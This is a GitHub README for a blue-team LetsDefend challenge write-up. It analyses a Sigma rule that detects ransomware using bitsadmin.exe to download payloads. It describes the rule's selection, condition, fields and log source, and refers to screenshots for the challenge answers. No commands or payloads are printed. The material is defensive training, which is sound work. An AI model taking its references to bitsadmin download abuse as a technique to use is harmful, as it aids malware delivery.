Skip to content

leratomakhasane/LetsDefend-Sigma-Challenge

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

18 Commits
images
images
Β 
Β 
README.md
README.md
Β 
Β 

Repository files navigation

LetsDefend-Sigma-Challenge

Detection engineering practice: Write-up and analysis of a LetsDefend challenge using a Sigma rule to detect ransomware activity leveraging bitsadmin.exe.

πŸ“Œ Objective

Detect and analyze a ransomware infection that leveraged the Windows utility bitsadmin.exe to download additional malicious payloads, using a Sigma detection rule.

🧠 Skills Learned

  • Understanding Sigma rules and their structure (selection, condition, tags, fields, log sources)

  • Investigating ransomware behaviour with built-in Windows utilities

  • Correlating malicious activity with command-and-control (C2) communication patterns

  • Applying detection engineering concepts in a real-world SOC scenario


πŸ›  Tools Used

  • LetsDefend Platform (challenge environment)

  • Sigma Rules (YAML format)

  • Windows Event Logs (proc_creation events)

  • Text Editor (to review .yml rule file)


πŸ”Ž Steps Performed

  1. Reviewed the challenge description: ransomware suspected of using bitsadmin.exe. The LetsDefend Challenge page explaining what the challenge is about

  2. Located the Sigma rule file:

C:\Users\LetsDefend\Desktop\ChallengeFile\proc_creation_win_bitsadmin_download.yml
  1. Analyzed the Sigma rule sections:

  • Selection: defined suspicious process creation patterns involving bitsadmin.exe.

  • Condition: combined selections to flag malicious usage.

  • Tags & Fields: identified the rule’s focus on ransomware and C2 communications.

  • Logsource: Windows process creation events.

  1. Mapped how this rule would detect attempts by ransomware to use bitsadmin.exe for downloads.

  2. Documented findings and uploaded screenshots for reference.

Explored the Lab Environment provided by LetsDefend A picture showing the lab environment of LetsDefend for the Sigma challenge

I used the Timeline Explorer for my findings Picture showing the Timeline Explorer window before doing any findings

I discovered that the targeted executable file was the one targeted by the Sigma rule A picture of the executable file

The command line option used to indicate the file transfer in the Sigma rule A picture of the command-line option used to indicate a file transfer

The logical expression in the condition field combined the criteria to trigger the Sigma rule A png file of the command line expression rule for the Sigma

The specific field the Sigma rule captured shows the command being executed The field that shows the command being executed

The single ATT&CK tactic tag listed first in the Sigma rule Single ATT&CK tactic tag listed first in the Sigma rule

The primary category of events that this Sigma rule was written to monitor The primary category of events for monitoring the Sigma rule

The specific command line argument the Sigma rule looked for to identify the HTTP-based downloads A png file of the command line expression rule for the Sigma

The command line that miust be present to create a new transfer using bitsadmin A picture of the command-line option used to indicate a file transfer

About

Detection engineering practice: Write-up and analysis of a LetsDefend challenge using a Sigma rule to detect ransomware activity leveraging bitsadmin.exe.

Topics

analysis cybersecurity blue-team sigma-rules soc-analyst

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors